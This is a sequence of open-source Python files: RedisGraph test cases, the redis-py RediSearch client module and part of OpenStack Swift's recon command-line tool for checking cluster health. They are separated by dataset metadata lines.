env = Env(decodeResponses=True)
redis_con = env.getConnection()
redis_graph = Graph(redis_con, GRAPH_ID)
# create a single node
redis_graph.query("create ()")
# expire key in 100ms
expire_in_ms = 100
env.assertTrue(redis_con.pexpire(GRAPH_ID, expire_in_ms))
# wait for key to expire
time.sleep((expire_in_ms * 3) / 1000) # convert from ms to sec
# key should have been evicted by now
env.assertFalse(redis_con.exists(GRAPH_ID))
try:
slowlog = redis_con.execute_command("GRAPH.SLOWLOG", GRAPH_ID)
except ResponseError as e:
env.assertIn("Invalid graph operation on empty key", str(e))
```
#### File: tests/flow/test_multiple_edges.py
```python
from common import *
GRAPH_ID = "multi_edge"
redis_graph = None
class testGraphMultipleEdgeFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, GRAPH_ID)
# Connect a single node to all other nodes.
def test_multiple_edges(self):
# Create graph with no edges.
query = """CREATE (a {v:1}), (b {v:2})"""
actual_result = redis_graph.query(query)
# Expecting no connections.
query = """MATCH (a {v:1})-[e]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(len(actual_result.result_set), 1)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 0)
# Connect a to b with a single edge of type R.
query = """MATCH (a {v:1}), (b {v:2}) CREATE (a)-[:R {v:1}]->(b)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_created, 1)
# Expecting single connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 1)
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN ID(e)"""
actual_result = redis_graph.query(query)
edge_id = actual_result.result_set[0][0]
self.env.assertEquals(edge_id, 0)
# Connect a to b with additional edge of type R.
query = """MATCH (a {v:1}), (b {v:2}) CREATE (a)-[:R {v:2}]->(b)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_created, 1)
# Expecting two connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 2)
# Variable length path.
query = """MATCH (a {v:1})-[:R*]->(b {v:2}) RETURN count(b)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 2)
# Remove first connection.
query = """MATCH (a {v:1})-[e:R {v:1}]->(b {v:2}) DELETE e"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_deleted, 1)
# Expecting single connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN e.v"""
actual_result = redis_graph.query(query)
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN ID(e)"""
actual_result = redis_graph.query(query)
edge_id = actual_result.result_set[0][0]
self.env.assertEquals(edge_id, 1)
# Remove second connection.
query = """MATCH (a {v:1})-[e:R {v:2}]->(b {v:2}) DELETE e"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_deleted, 1)
# Expecting no connections.
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(len(actual_result.result_set), 1)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 0)
# Remove a non-existent connection.
query = """MATCH (a {v:1})-[e]->(b {v:2}) DELETE e"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_deleted, 0)
# Make sure we can reform connections.
query = """MATCH (a {v:1}), (b {v:2}) CREATE (a)-[:R {v:3}]->(b)"""
actual_result = redis_graph.query(query)
self.env.assertEquals(actual_result.relationships_created, 1)
query = """MATCH (a {v:1})-[e:R]->(b {v:2}) RETURN count(e)"""
actual_result = redis_graph.query(query)
edge_count = actual_result.result_set[0][0]
self.env.assertEquals(edge_count, 1)
```
#### File: tests/flow/test_null_handling.py
```python
from common import *
redis_graph = None
class testNullHandlingFlow(FlowTestsBase):
def __init__(self):
self.env = Env(decodeResponses=True)
global redis_graph
redis_con = self.env.getConnection()
redis_graph = Graph(redis_con, "null_handling")
self.populate_graph()
def populate_graph(self):
# Create a single node.
node = Node(label="L", properties={"v": "v1"})
redis_graph.add_node(node)
redis_graph.flush()
# Error when attempting to create a relationship with a null endpoint.
def test01_create_null(self):
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) CREATE (nonexistent_node)-[:E]->(a)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) CREATE (a)-[:E]->(nonexistent_node)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
# Error when attempting to merge a relationship with a null endpoint.
def test02_merge_null(self):
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) MERGE (nonexistent_node)-[:E]->(a)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
try:
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) MERGE (a)-[:E]->(nonexistent_node)"""
redis_graph.query(query)
assert(False)
except redis.exceptions.ResponseError:
# Expecting an error.
pass
# SET should update attributes on non-null entities and ignore null entities.
def test03_set_null(self):
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) SET a.v2 = true, nonexistent_node.v2 = true, a.v3 = nonexistent_node.v3 RETURN a.v2, nonexistent_node.v2, a.v3"""
actual_result = redis_graph.query(query)
# The property should be set on the real node and ignored on the null entity.
assert(actual_result.properties_set == 1)
expected_result = [[True, None, None]]
self.env.assertEquals(actual_result.result_set, expected_result)
# DELETE should ignore null entities.
def test04_delete_null(self):
query = """MATCH (a) OPTIONAL MATCH (a)-[nonexistent_edge]->(nonexistent_node) DELETE nonexistent_node"""
actual_result = redis_graph.query(query)
assert(actual_result.nodes_deleted == 0)
# Functions should handle null inputs appropriately.
def test05_null_function_inputs(self):
query = """MATCH (a) OPTIONAL MATCH (a)-[r]->(b) RETURN type(r), labels(b), b.v * 5"""
actual_result = redis_graph.query(query)
expected_result = [[None, None, None]]
self.env.assertEquals(actual_result.result_set, expected_result)
# Path functions should handle null inputs appropriately.
def test06_null_named_path_function_inputs(self):
query = """MATCH (a) OPTIONAL MATCH p = (a)-[r]->() RETURN p, length(p), collect(relationships(p))"""
actual_result = redis_graph.query(query)
# The path and function calls on it should return NULL, while collect() returns an empty array.
expected_result = [[None, None, []]]
self.env.assertEquals(actual_result.result_set, expected_result)
# Scan and traversal operations should gracefully handle NULL inputs.
def test07_null_graph_entity_inputs(self):
query = """WITH NULL AS a MATCH (a) RETURN a"""
actual_result = redis_graph.query(query)
# Expect one NULL entity to be returned.
expected_result = [[None]]
self.env.assertEquals(actual_result.result_set, expected_result)
query = """WITH NULL AS a MATCH (a)-[e]->(b) RETURN a, e, b"""
plan = redis_graph.execution_plan(query)
# Verify that we are attempting to perform a traversal but no scan.
self.env.assertNotIn("Scan", plan)
self.env.assertIn("Conditional Traverse", plan)
actual_result = redis_graph.query(query)
# Expect no results.
expected_result = []
self.env.assertEquals(actual_result.result_set, expected_result)
query = """WITH NULL AS e MATCH (a:L)-[e]->(b) RETURN a, e, b"""
plan = redis_graph.execution_plan(query)
# Verify that we are performing a scan and traversal.
self.env.assertIn("Label Scan", plan)
self.env.assertIn("Conditional Traverse", plan)
actual_result = redis_graph.query(query)
# Expect no results.
expected_result = []
self.env.assertEquals(actual_result.result_set, expected_result)
# ValueHashJoin ops should not treat null values as equal.
def test08_null_value_hash_join(self):
query = """MATCH (a), (b) WHERE a.fakeval = b.fakeval RETURN a, b"""
plan = redis_graph.execution_plan(query)
# Verify that we are performing a ValueHashJoin
self.env.assertIn("Value Hash Join", plan)
actual_result = redis_graph.query(query)
# Expect no results.
expected_result = []
self.env.assertEquals(actual_result.result_set, expected_result)
# Perform a sanity check on a ValueHashJoin that returns a result
query = """MATCH (a), (b) WHERE a.v = b.v RETURN a.v, b.v"""
actual_result = redis_graph.query(query)
expected_result = [['v1', 'v1']]
self.env.assertEquals(actual_result.result_set, expected_result)
```
#### File: tests/flow/test_replication_states.py
```python
from common import *
from itertools import permutations
from enum import Enum
import random
class Connection(Enum):
Connected = 1
Disconnected = 2
# TODO: when introducing a new encoder/decoder this needs to be updated;
# consider using the GRAPH.DEBUG command to be able to get this data
keys = {
b'x': b'\x07\x81\x82\xb6\xa9\x85\xd6\xadh\n\x05\x02x\x00\x02\x1e\x02\x00\x02\x01\x02\x00\x02\x03\x02\x01\x05\x02v\x00\x02\x01\x02\x00\x05\x02N\x00\x02\x01\x02\x01\x05\x02v\x00\x02\x00\x02\x01\x02\x01\x02\n\x02\x00\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x01\x02\x01\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x02\x02\x02\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x03\x02\x03\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x04\x02\x04\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x05\x02\x05\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x06\x02\x06\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x07\x02\x07\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x08\x02\x08\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\t\x02\t\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\n\x00\t\x00\x84\xf96Z\xd1\x98\xec\xc0',
b'{x}x_a244836f-fe81-4f8d-8ee2-83fc3fbcf102': b'\x07\x81\x82\xb6\xa9\x86g\xadh\n\x05\x02x\x00\x02\x1e\x02\x00\x02\x01\x02\x00\x02\x03\x02\x01\x05\x02v\x00\x02\x01\x02\x00\x05\x02N\x00\x02\x01\x02\x01\x05\x02v\x00\x02\x00\x02\x01\x02\x01\x02\n\x02\n\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0b\x02\x0b\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0c\x02\x0c\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\r\x02\r\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0e\x02\x0e\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x0f\x02\x0f\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x10\x02\x10\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x11\x02\x11\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x12\x02\x12\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x13\x02\x13\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x14\x00\t\x00\x13H\x11\xb8\x15\xd3\xdc~',
b'{x}x_53ab30bb-1dbb-47b2-a41d-cac3acd68b8c': b'\x07\x81\x82\xb6\xa9\x86g\xadh\n\x05\x02x\x00\x02\x1e\x02\x00\x02\x01\x02\x00\x02\x03\x02\x01\x05\x02v\x00\x02\x01\x02\x00\x05\x02N\x00\x02\x01\x02\x01\x05\x02v\x00\x02\x00\x02\x05\x02\x01\x02\n\x02\x02\x02\x00\x02\x03\x02\x00\x02\x04\x02\x00\x02\x05\x02\x01\x02\x14\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x15\x02\x15\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x16\x02\x16\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x17\x02\x17\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x18\x02\x18\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x19\x02\x19\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1a\x02\x1a\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1b\x02\x1b\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1c\x02\x1c\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1d\x02\x1d\x02\x01\x02\x00\x02\x01\x02\x00\x02`\x00\x02\x1e\x00\t\x00\x1b\xa64\xd6\xf5\x0bk\xa6'
}
# test to see if replication works as expected when importing data
# RedisGraph should replicate all data using the virtual keys mechanism
# in case we imported only part of the data, validate that we replicate it
# correctly.
class testReplicationState():
def __init__(self):
self.env = Env(useSlaves=True, decodeResponses=True, env='oss', moduleArgs='VKEY_MAX_ENTITY_COUNT 10')
self.master = self.env.getConnection()
self.slave = self.env.getSlaveConnection()
info = self.slave.info("Replication")
self.master_host = info["master_host"]
self.master_port = info["master_port"]
self.connection_state = Connection.Connected
# skip test if we're running under Valgrind
if self.env.envRunner.debugger is not None:
self.env.skip() # valgrind is not working correctly with replication
# check that the expected key count exists in both master and slave
def _check(self, keys_master, keys_slave):
if keys_master is not None:
keys = self.master.keys('*')
self.env.assertEqual(len(keys), keys_master)
if keys_slave is not None:
# the WAIT command forces master slave sync to complete
self.master.execute_command("WAIT", "1", "0")
keys = self.slave.keys('*')
self.env.assertEqual(len(keys), keys_slave)
if keys_master is not None:
keys = self.master.keys('*')
self.env.assertEqual(len(keys), keys_master)
# restore the key data and validate the # of keys
def _step(self, key, keys_master):
self.master.restore(key, '0', keys[key])
self._check(keys_master, None)
# validate that the imported data exists in both master and slave
def _test_data(self):
expected = [[i] for i in range(1, 31)]
q = "MATCH (n:N) RETURN n.v"
result = self.master.execute_command("GRAPH.RO_QUERY", "x", q)
self.env.assertEqual(result[1], expected)
result = self.slave.execute_command("GRAPH.RO_QUERY", "x", q)
self.env.assertEqual(result[1], expected)
def _connect_replication(self):
if self.connection_state == Connection.Disconnected:
self.slave.slaveof(self.master_host, self.master_port)
self.connection_state = Connection.Connected
def _disconnect_replication(self):
if self.connection_state == Connection.Connected:
self.slave.slaveof()
self.connection_state = Connection.Disconnected
def _connection_permutation(self, state, i):
if state[i] == 1:
self._connect_replication()
elif state[i] == 0:
self._disconnect_replication()
def _permutation(self, r, d):
for i in range(r ** d):
res = []
for j in range(d):
res.append((i >> j) % 2)
yield res
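# A worked example of the generator above: list(self._permutation(2, 3))
# yields the 8 LSB-first bit vectors [0, 0, 0], [1, 0, 0], [0, 1, 0],
# [1, 1, 0], [0, 0, 1], ..., [1, 1, 1]; each entry later drives one
# connect (1) / disconnect (0) toggle per replication step.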
def _choose_random(self, iter, k):
is_random = True
if is_random:
return random.choices(list(iter), k=k)
return iter
def test_replication_permutations(self):
for scenario in self._choose_random(permutations(keys.keys()), 2):
print(f"scenario: {scenario}")
for connection_permutation in self._choose_random(self._permutation(2, 5), 3):
print(f"connection_permutation: {connection_permutation}")
self.master.flushall()
self._check(0, 0)
self._connection_permutation(connection_permutation, 0)
aux = self.master.execute_command("GRAPH.DEBUG", "AUX", "START")
self.env.assertEqual(aux, 1)
self._connection_permutation(connection_permutation, 1)
self._step(scenario[0], 1)
self._connection_permutation(connection_permutation, 2)
self._step(scenario[1], 2)
self._connection_permutation(connection_permutation, 3)
self._step(scenario[2], 3)
self._connection_permutation(connection_permutation, 4)
aux = self.master.execute_command("GRAPH.DEBUG", "AUX", "END")
self.env.assertEqual(aux, 0)
self._connect_replication()
self._check(1, 1)
self._test_data()
``` |
{
"source": "10088/redis-py",
"score": 3
} |
#### File: commands/search/__init__.py
```python
import redis
from .commands import AsyncSearchCommands, SearchCommands
class Search(SearchCommands):
"""
Create a client for talking to search.
It abstracts the API of the module and lets you just use the engine.
"""
class BatchIndexer:
"""
A batch indexer allows you to automatically batch
document indexing in pipelines, flushing it every N documents.
"""
def __init__(self, client, chunk_size=1000):
self.client = client
self.execute_command = client.execute_command
self._pipeline = client.pipeline(transaction=False, shard_hint=None)
self.total = 0
self.chunk_size = chunk_size
self.current_chunk = 0
def __del__(self):
if self.current_chunk:
self.commit()
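# Note: relying on __del__ for the final flush is best-effort; it may
# never run (e.g. during interpreter teardown), so callers should invoke
# commit() explicitly once indexing is done.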
def add_document(
self,
doc_id,
nosave=False,
score=1.0,
payload=None,
replace=False,
partial=False,
no_create=False,
**fields,
):
"""
Add a document to the batch query
"""
self.client._add_document(
doc_id,
conn=self._pipeline,
nosave=nosave,
score=score,
payload=payload,
replace=replace,
partial=partial,
no_create=no_create,
**fields,
)
self.current_chunk += 1
self.total += 1
if self.current_chunk >= self.chunk_size:
self.commit()
def add_document_hash(
self,
doc_id,
score=1.0,
replace=False,
):
"""
Add a hash to the batch query
"""
self.client._add_document_hash(
doc_id,
conn=self._pipeline,
score=score,
replace=replace,
)
self.current_chunk += 1
self.total += 1
if self.current_chunk >= self.chunk_size:
self.commit()
def commit(self):
"""
Manually commit and flush the batch indexing query
"""
self._pipeline.execute()
self.current_chunk = 0
def __init__(self, client, index_name="idx"):
"""
Create a new Client for the given index_name.
The default name is `idx`
If conn is not None, we employ an already existing redis connection
"""
self.MODULE_CALLBACKS = {}
self.client = client
self.index_name = index_name
self.execute_command = client.execute_command
self._pipeline = client.pipeline
def pipeline(self, transaction=True, shard_hint=None):
"""Creates a pipeline for the SEARCH module, that can be used for executing
SEARCH commands, as well as classic core commands.
"""
p = Pipeline(
connection_pool=self.client.connection_pool,
response_callbacks=self.MODULE_CALLBACKS,
transaction=transaction,
shard_hint=shard_hint,
)
p.index_name = self.index_name
return p
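# Minimal usage sketch (hypothetical index and field names; assumes a
# Redis server with the RediSearch module loaded):
#
#   r = redis.Redis()
#   search = Search(r, index_name="idx")
#   batch = Search.BatchIndexer(search, chunk_size=500)
#   batch.add_document("doc:1", title="hello world")
#   batch.commit()  # flush whatever remains below chunk_size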
class AsyncSearch(Search, AsyncSearchCommands):
class BatchIndexer(Search.BatchIndexer):
"""
A batch indexer allows you to automatically batch
document indexing in pipelines, flushing it every N documents.
"""
async def add_document(
self,
doc_id,
nosave=False,
score=1.0,
payload=None,
replace=False,
partial=False,
no_create=False,
**fields,
):
"""
Add a document to the batch query
"""
self.client._add_document(
doc_id,
conn=self._pipeline,
nosave=nosave,
score=score,
payload=payload,
replace=replace,
partial=partial,
no_create=no_create,
**fields,
)
self.current_chunk += 1
self.total += 1
if self.current_chunk >= self.chunk_size:
await self.commit()
async def commit(self):
"""
Manually commit and flush the batch indexing query
"""
await self._pipeline.execute()
self.current_chunk = 0
def pipeline(self, transaction=True, shard_hint=None):
"""Creates a pipeline for the SEARCH module, that can be used for executing
SEARCH commands, as well as classic core commands.
"""
p = AsyncPipeline(
connection_pool=self.client.connection_pool,
response_callbacks=self.MODULE_CALLBACKS,
transaction=transaction,
shard_hint=shard_hint,
)
p.index_name = self.index_name
return p
class Pipeline(SearchCommands, redis.client.Pipeline):
"""Pipeline for the module."""
class AsyncPipeline(AsyncSearchCommands, redis.asyncio.client.Pipeline):
"""AsyncPipeline for the module."""
``` |
{
"source": "10088/swift",
"score": 2
} |
#### File: swift/cli/recon.py
```python
from __future__ import print_function
from eventlet.green import socket
from six import string_types
from six.moves.urllib.parse import urlparse
from swift.common.utils import (
SWIFT_CONF_FILE, md5_hash_for_file, set_swift_dir)
from swift.common.ring import Ring
from swift.common.storage_policy import POLICIES, reload_storage_policies
import eventlet
import json
import optparse
import time
import sys
import six
import os
if six.PY3:
from eventlet.green.urllib import request as urllib2
else:
from eventlet.green import urllib2
def seconds2timeunit(seconds):
elapsed = seconds
unit = 'seconds'
if elapsed >= 60:
elapsed = elapsed / 60.0
unit = 'minutes'
if elapsed >= 60:
elapsed = elapsed / 60.0
unit = 'hours'
if elapsed >= 24:
elapsed = elapsed / 24.0
unit = 'days'
return elapsed, unit
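# e.g. seconds2timeunit(90061) returns (~1.04, 'days'):
# 90061 s -> ~1501 minutes -> ~25.0 hours -> ~1.04 days.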
def size_suffix(size):
suffixes = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB']
for suffix in suffixes:
if size < 1000:
return "%s %s" % (size, suffix)
size = size // 1000
return "%s %s" % (size, suffix)
class Scout(object):
"""
Obtain swift recon information
"""
def __init__(self, recon_type, verbose=False, suppress_errors=False,
timeout=5):
self.recon_type = recon_type
self.verbose = verbose
self.suppress_errors = suppress_errors
self.timeout = timeout
def scout_host(self, base_url, recon_type):
"""
Perform the actual HTTP request to obtain swift recon telemetry.
:param base_url: the base url of the host you wish to check. str of the
format 'http://127.0.0.1:6200/recon/'
:param recon_type: the swift recon check to request.
:returns: tuple of (recon url used, response body, and status)
"""
url = base_url + recon_type
try:
body = urllib2.urlopen(url, timeout=self.timeout).read()
if six.PY3 and isinstance(body, six.binary_type):
body = body.decode('utf8')
content = json.loads(body)
if self.verbose:
print("-> %s: %s" % (url, content))
status = 200
except urllib2.HTTPError as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = err.code
except (urllib2.URLError, socket.timeout) as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = -1
return url, content, status
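# e.g. (hypothetical host) Scout('diskusage').scout_host(
#     'http://127.0.0.1:6200/recon/', 'diskusage')
# returns ('http://127.0.0.1:6200/recon/diskusage', <parsed JSON>, 200)
# on success, or (url, <the exception>, -1) if the host is unreachable.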
def scout(self, host):
"""
Obtain telemetry from a host running the swift recon middleware.
:param host: host to check
:returns: tuple of (recon url used, response body, status, time start
and time end)
"""
base_url = "http://%s:%s/recon/" % (host[0], host[1])
ts_start = time.time()
url, content, status = self.scout_host(base_url, self.recon_type)
ts_end = time.time()
return url, content, status, ts_start, ts_end
def scout_server_type(self, host):
"""
Obtain Server header by calling OPTIONS.
:param host: host to check
:returns: tuple of (url, Server type string, status)
"""
try:
url = "http://%s:%s/" % (host[0], host[1])
req = urllib2.Request(url)
req.get_method = lambda: 'OPTIONS'
conn = urllib2.urlopen(req)
header = conn.info().get('Server')
server_header = header.split('/')
content = server_header[0]
status = 200
except urllib2.HTTPError as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = err.code
except (urllib2.URLError, socket.timeout) as err:
if not self.suppress_errors or self.verbose:
print("-> %s: %s" % (url, err))
content = err
status = -1
return url, content, status
class SwiftRecon(object):
"""
Retrieve and report cluster info from hosts running recon middleware.
"""
def __init__(self):
self.verbose = False
self.suppress_errors = False
self.timeout = 5
self.pool_size = 30
self.pool = eventlet.GreenPool(self.pool_size)
self.check_types = ['account', 'container', 'object']
self.server_type = 'object'
def _gen_stats(self, stats, name=None):
"""Compute various stats from a list of values."""
cstats = [x for x in stats if x is not None]
if len(cstats) > 0:
ret_dict = {'low': min(cstats), 'high': max(cstats),
'total': sum(cstats), 'reported': len(cstats),
'number_none': len(stats) - len(cstats), 'name': name}
ret_dict['average'] = ret_dict['total'] / float(len(cstats))
ret_dict['perc_none'] = \
ret_dict['number_none'] * 100.0 / len(stats)
else:
ret_dict = {'reported': 0}
return ret_dict
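# e.g. _gen_stats([2, 4, None], 'async_pending') returns
# {'low': 2, 'high': 4, 'total': 6, 'reported': 2, 'number_none': 1,
#  'name': 'async_pending', 'average': 3.0, 'perc_none': 33.33...}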
def _print_stats(self, stats):
"""
print out formatted stats to console
:param stats: dict of stats generated by _gen_stats
"""
print('[%(name)s] low: %(low)d, high: %(high)d, avg: '
'%(average).1f, total: %(total)d, '
'Failed: %(perc_none).1f%%, no_result: %(number_none)d, '
'reported: %(reported)d' % stats)
def _ptime(self, timev=None):
"""
:param timev: a unix timestamp or None
:returns: a pretty string of the current time or provided time in UTC
"""
if timev:
return time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(timev))
else:
return time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
def get_hosts(self, region_filter, zone_filter, swift_dir, ring_names):
"""
Get a list of hosts in the rings.
:param region_filter: Only list regions matching given filter
:param zone_filter: Only list zones matching given filter
:param swift_dir: Directory of swift config, usually /etc/swift
:param ring_names: Collection of ring names, such as
['object', 'object-2']
:returns: a set of tuples containing the ip and port of hosts
"""
rings = [Ring(swift_dir, ring_name=n) for n in ring_names]
devs = [d for r in rings for d in r.devs if d]
if region_filter is not None:
devs = [d for d in devs if d['region'] == region_filter]
if zone_filter is not None:
devs = [d for d in devs if d['zone'] == zone_filter]
return set((d['ip'], d['port']) for d in devs)
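# e.g. get_hosts(None, None, '/etc/swift', ['object', 'object-2'])
# returns the deduplicated set of (ip, port) tuples across both object
# rings; passing region_filter=1 would keep only region-1 devices.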
def get_ringmd5(self, hosts, swift_dir):
"""
Compare ring md5sum's with those on remote host
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
:param swift_dir: The local directory with the ring files.
"""
matches = 0
errors = 0
ring_names = set()
if self.server_type == 'object':
for ring_name in os.listdir(swift_dir):
if ring_name.startswith('object') and \
ring_name.endswith('.ring.gz'):
ring_names.add(ring_name)
else:
ring_name = '%s.ring.gz' % self.server_type
ring_names.add(ring_name)
rings = {}
for ring_name in ring_names:
rings[ring_name] = md5_hash_for_file(
os.path.join(swift_dir, ring_name))
recon = Scout("ringmd5", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking ring md5sums" % self._ptime())
if self.verbose:
for ring_file, ring_sum in rings.items():
print("-> On disk %s md5sum: %s" % (ring_file, ring_sum))
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status != 200:
errors = errors + 1
continue
success = True
for remote_ring_file, remote_ring_sum in response.items():
remote_ring_name = os.path.basename(remote_ring_file)
if not remote_ring_name.startswith(self.server_type):
continue
ring_sum = rings.get(remote_ring_name, None)
if remote_ring_sum != ring_sum:
success = False
print("!! %s (%s => %s) doesn't match on disk md5sum" % (
url, remote_ring_name, remote_ring_sum))
if not success:
errors += 1
continue
matches += 1
if self.verbose:
print("-> %s matches." % url)
print("%s/%s hosts matched, %s error[s] while checking hosts." % (
matches, len(hosts), errors))
print("=" * 79)
def get_swiftconfmd5(self, hosts, printfn=print):
"""
Compare swift.conf md5sum with that on remote hosts
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
:param printfn: function to print text; defaults to print()
"""
matches = 0
errors = 0
conf_sum = md5_hash_for_file(SWIFT_CONF_FILE)
recon = Scout("swiftconfmd5", self.verbose, self.suppress_errors,
self.timeout)
printfn("[%s] Checking swift.conf md5sum" % self._ptime())
if self.verbose:
printfn("-> On disk swift.conf md5sum: %s" % (conf_sum,))
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
if response[SWIFT_CONF_FILE] != conf_sum:
printfn("!! %s (%s) doesn't match on disk md5sum" %
(url, response[SWIFT_CONF_FILE]))
else:
matches = matches + 1
if self.verbose:
printfn("-> %s matches." % url)
else:
errors = errors + 1
printfn("%s/%s hosts matched, %s error[s] while checking hosts."
% (matches, len(hosts), errors))
printfn("=" * 79)
def async_check(self, hosts):
"""
Obtain and print async pending statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
scan = {}
recon = Scout("async", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking async pendings" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
scan[url] = response['async_pending']
stats = self._gen_stats(scan.values(), 'async_pending')
if stats['reported'] > 0:
self._print_stats(stats)
else:
print("[async_pending] - No hosts returned valid data.")
print("=" * 79)
def driveaudit_check(self, hosts):
"""
Obtain and print drive audit error statistics
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
scan = {}
recon = Scout("driveaudit", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Checking drive-audit errors" % self._ptime())
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
scan[url] = response['drive_audit_errors']
stats = self._gen_stats(scan.values(), 'drive_audit_errors')
if stats['reported'] > 0:
self._print_stats(stats)
else:
print("[drive_audit_errors] - No hosts returned valid data.")
print("=" * 79)
def umount_check(self, hosts):
"""
Check for and print unmounted drives
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
unmounted = {}
errors = {}
recon = Scout("unmounted", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Getting unmounted drives from %s hosts..." %
(self._ptime(), len(hosts)))
for url, response, status, ts_start, ts_end in self.pool.imap(
recon.scout, hosts):
if status == 200:
unmounted[url] = []
errors[url] = []
for i in response:
if not isinstance(i['mounted'], bool):
errors[url].append(i['device'])
else:
unmounted[url].append(i['device'])
for host in unmounted:
node = urlparse(host).netloc
for entry in unmounted[host]:
print("Not mounted: %s on %s" % (entry, node))
for host in errors:
node = urlparse(host).netloc
for entry in errors[host]:
print("Device errors: %s on %s" % (entry, node))
print("=" * 79)
def server_type_check(self, hosts):
"""
Check for server types on the ring
:param hosts: set of hosts to check. in the format of:
set([('127.0.0.1', 6220), ('127.0.0.2', 6230)])
"""
errors = {}
recon = Scout("server_type_check", self.verbose, self.suppress_errors,
self.timeout)
print("[%s] Validating server type '%s' on %s hosts..." %
(self._ptime(), self.server_type, len(hosts)))
for url, response, status in self.pool.imap(
recon.scout_server_type, hosts):
if status == 200:
if response != self.server_type + '-server':
errors[url] = response
print("%s/%s hosts ok, %s error[s] while checking hosts." % (
len(hosts) - len(errors), len(hosts), len(errors)))
for host in errors:
